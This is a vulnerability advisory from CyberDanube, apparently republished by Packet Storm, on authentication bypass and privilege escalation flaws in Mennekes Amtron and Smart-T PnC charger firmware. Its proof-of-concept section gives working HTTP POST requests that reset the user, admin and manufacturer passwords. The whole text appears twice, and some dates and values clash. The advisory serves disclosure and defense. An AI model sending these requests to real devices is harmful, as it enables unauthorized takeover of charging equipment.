10
/ 10
CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H/E:P
Description
Mennekes Amtron Series and Smart-T PnC version 5.22.3 suffers from authentication bypass and privilege escalation vulnerabilities...
Basic Information
ID
PACKETSTORM:222403
Published
Jun 1, 2026 at 00:00
Affected Product
Affected Versions
CyberDanube Security Research 20260528-0
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| Mennekes Amtron Series and Smart-T PnC
vulnerable version| 5.22.3
fixed version| 5.33.11-21500
CVE number| CVE-2026-8979, CVE-2026-8980
impact| High
homepage| https://www.mennekes.at/
found| 2025-11-27
by| S. Eisenreich-Dietz, T. Weber
| CyberDanube Security Research
| Austria - Vienna
| https://www.cyberdanube.com
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
For more than 80 years, MENNEKES has stood for quality electrical products and
service throughout the world. When it comes to solutions that handle current
intelligently and safely, we set the standard for innovation, quality,
manufacturing and development.
Source: https://www.mennekes.com/about/about-us
Vulnerable Products
-------------------------------------------------------------------------------
Amtron Professional
Amtron Professional (Eichrecht)
Amedio Professional
Amtron Charge Control
Amtron Professional Twincharge
Smart-T PnC
Vulnerability Overview
-------------------------------------------------------------------------------
1) Authentication Bypass (CVE-2026-8979)
An unauthentication attacker can use a crafted POST request to change the
password of the user account.
2) Privilege Escalation (CVE-2026-8980)
An authenticated attacker can use a crafted POST request to change the password
of the manufacturer and admin account as low privileged user.
Proof of Concept
-------------------------------------------------------------------------------
1) Authentication Bypass (CVE-2026-8979)
The following POST request can be used to change the password of the user
account to "asdf"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /operator/operator HTTP/1.1
Host: 10.201.74.66
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
UserPwdPlain_custom=asdf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2) Privilege Escalation (CVE-2026-8980)
The following POST requests can be used to change the admin (operator) and
manufacturer account password to "asdf".
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /json/settings.json HTTP/1.1
Host: 10.201.74.66
Content-Length: 60
Authorization: e81179e1-5e50-45d4-8ee6-27161dcf69d8
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Origin: http://10.201.74.66
Referer: http://10.201.74.66/groups/system
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"params":[{"key":"OperatorPwdPlain_custom","value":"asd"}]}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /json/settings.json HTTP/1.1
Host: 10.201.74.66
Content-Length: 59
Authorization: 526ee807-4295-46f3-a9e4-0f4bcac97af9
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Origin: http://10.201.74.66
Referer: http://10.201.74.66/groups/system
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"params":[{"key":"ManufacturerPwd_custom","value":"asd"}]}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution
-------------------------------------------------------------------------------
Update to the newest Firmware.
Workaround
-------------------------------------------------------------------------------
Restrict access to the device.
Contact Timeline
-------------------------------------------------------------------------------
2025-02-24:βGet in contact with [email protected]
2025-02-25:βVulnerabilities get acknowledged and are forwarded to BENDER
as they are the manufacturer for the devices.
2025-03-18:βAsk for update regarding fixes, CVE numbers, fixed version and
effected products. Response states that they will not create
CVEs.
2025-05-28: Release of advisory.ββββ
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF S. Eisenreich-Dietz / @2026
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| Mennekes Amtron Series and Smart-T PnC
vulnerable version| 5.22.3
fixed version| 5.33.11-21500
CVE number| CVE-2026-8979, CVE-2026-8980
impact| High
homepage| https://www.mennekes.at/
found| 2025-11-27
by| S. Eisenreich-Dietz, T. Weber
| CyberDanube Security Research
| Austria - Vienna
| https://www.cyberdanube.com
-------------------------------------------------------------------------------
Vendor description
-------------------------------------------------------------------------------
For more than 80 years, MENNEKES has stood for quality electrical products and
service throughout the world. When it comes to solutions that handle current
intelligently and safely, we set the standard for innovation, quality,
manufacturing and development.
Source: https://www.mennekes.com/about/about-us
Vulnerable Products
-------------------------------------------------------------------------------
Amtron Professional
Amtron Professional (Eichrecht)
Amedio Professional
Amtron Charge Control
Amtron Professional Twincharge
Smart-T PnC
Vulnerability Overview
-------------------------------------------------------------------------------
1) Authentication Bypass (CVE-2026-8979)
An unauthentication attacker can use a crafted POST request to change the
password of the user account.
2) Privilege Escalation (CVE-2026-8980)
An authenticated attacker can use a crafted POST request to change the password
of the manufacturer and admin account as low privileged user.
Proof of Concept
-------------------------------------------------------------------------------
1) Authentication Bypass (CVE-2026-8979)
The following POST request can be used to change the password of the user
account to "asdf"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /operator/operator HTTP/1.1
Host: 10.201.74.66
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
UserPwdPlain_custom=asdf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2) Privilege Escalation (CVE-2026-8980)
The following POST requests can be used to change the admin (operator) and
manufacturer account password to "asdf".
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /json/settings.json HTTP/1.1
Host: 10.201.74.66
Content-Length: 60
Authorization: e81179e1-5e50-45d4-8ee6-27161dcf69d8
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Origin: http://10.201.74.66
Referer: http://10.201.74.66/groups/system
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"params":[{"key":"OperatorPwdPlain_custom","value":"asd"}]}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /json/settings.json HTTP/1.1
Host: 10.201.74.66
Content-Length: 59
Authorization: 526ee807-4295-46f3-a9e4-0f4bcac97af9
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/133.0.0.0 Safari/537.36
Origin: http://10.201.74.66
Referer: http://10.201.74.66/groups/system
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"params":[{"key":"ManufacturerPwd_custom","value":"asd"}]}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution
-------------------------------------------------------------------------------
Update to the newest Firmware.
Workaround
-------------------------------------------------------------------------------
Restrict access to the device.
Contact Timeline
-------------------------------------------------------------------------------
2025-02-24:βGet in contact with [email protected]
2025-02-25:βVulnerabilities get acknowledged and are forwarded to BENDER
as they are the manufacturer for the devices.
2025-03-18:βAsk for update regarding fixes, CVE numbers, fixed version and
effected products. Response states that they will not create
CVEs.
2025-05-28: Release of advisory.ββββ
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF S. Eisenreich-Dietz / @2026